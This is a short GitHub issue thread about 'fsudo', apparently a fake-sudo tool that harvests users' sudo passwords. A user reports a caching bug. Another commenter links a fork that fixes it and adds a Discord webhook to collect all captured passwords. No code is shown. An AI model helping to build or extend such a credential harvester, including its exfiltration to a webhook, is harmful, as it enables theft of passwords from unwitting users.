### ISSUE TITLE
bug

### ISSUE THREAD

**Issue by hackendltd** [mthbernardes/fsudo#1]
If sudo successfully executes the password once, then sudo will not ask for the password again, and your program will ask for the password again

**Comment by hackendltd** [comment]
you  try execute $sudo bash

**Comment by nongiach** [comment]
Hey,
here is what you want: https://github.com/nongiach/fsudo
Just updated it for that and also added a discord webhook to receive all passwords.

Regards,

**Comment by hackendltd** [comment]
> Hey,
> here is what you want: https://github.com/nongiach/fsudo
> Just updated it for that and also added a discord webhook to receive all passwords.
> 
> Regards,

Thank you.i try...
